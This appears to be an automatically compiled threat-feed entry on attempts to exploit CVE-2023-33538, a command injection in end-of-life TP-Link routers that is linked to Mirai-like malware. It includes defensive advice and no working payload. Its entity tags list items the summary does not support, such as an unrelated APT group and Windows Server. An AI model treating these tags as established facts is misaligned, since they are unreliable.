Back

Exploitation Attempts on TP-Link Routers via CVE-2023-33538 Linked to Mirai Malware

Severity: Medium (Score: 54.9)

Sources: Cybersecuritydive, Cybersecuritynews, web.archive.org, Gbhackers

Summary

Hackers are actively targeting a command injection vulnerability, CVE-2023-33538, affecting several end-of-life TP-Link router models, including TL-WR940N and TL-WR841N. This vulnerability allows attackers to execute arbitrary commands on the routers' web management interface, particularly through the ssid1 parameter. While exploitation attempts have been detected, they have not been successful due to critical implementation errors, such as the need for valid authentication and the use of incorrect parameters. The vulnerability was disclosed in June 2023 and added to CISA's Known Exploited Vulnerabilities catalog in June 2025. The observed payloads show similarities to Mirai botnet malware, indicating a potential for creating a new botnet. Users are advised to replace these devices as they no longer receive security updates. Default credentials should also be changed to mitigate risks. The situation remains under close observation as researchers continue to analyze the threat. Key Points: • CVE-2023-33538 affects multiple end-of-life TP-Link router models. • Exploitation attempts are linked to Mirai-like malware but have not succeeded yet. • Users are urged to replace vulnerable routers and change default credentials.

Key Entities

  • Sapphire Sleet (apt_group)
  • Botnet (attack_type)
  • Command Injection (attack_type)
  • Data Breach (attack_type)
  • DDoS (attack_type)
  • Malware (attack_type)
  • TP-Link (company)
  • CVE-2020-27600 (cve)
  • CVE-2021-46315 (cve)
  • CVE-2021-46319 (cve)
  • CVE-2023-33538 (cve)
  • CWE-78 - OS Command Injection (cwe)
  • CWE-798 - Use of Hard-coded Credentials (cwe)
  • Condi (malware)
  • Mirai (malware)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • T1105 - Ingress Tool Transfer (mitre_attack)
  • TP-Link Archer Routers (platform)
  • TP-Link Omada Routers (platform)
  • Windows Server (platform)
  • wget (tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed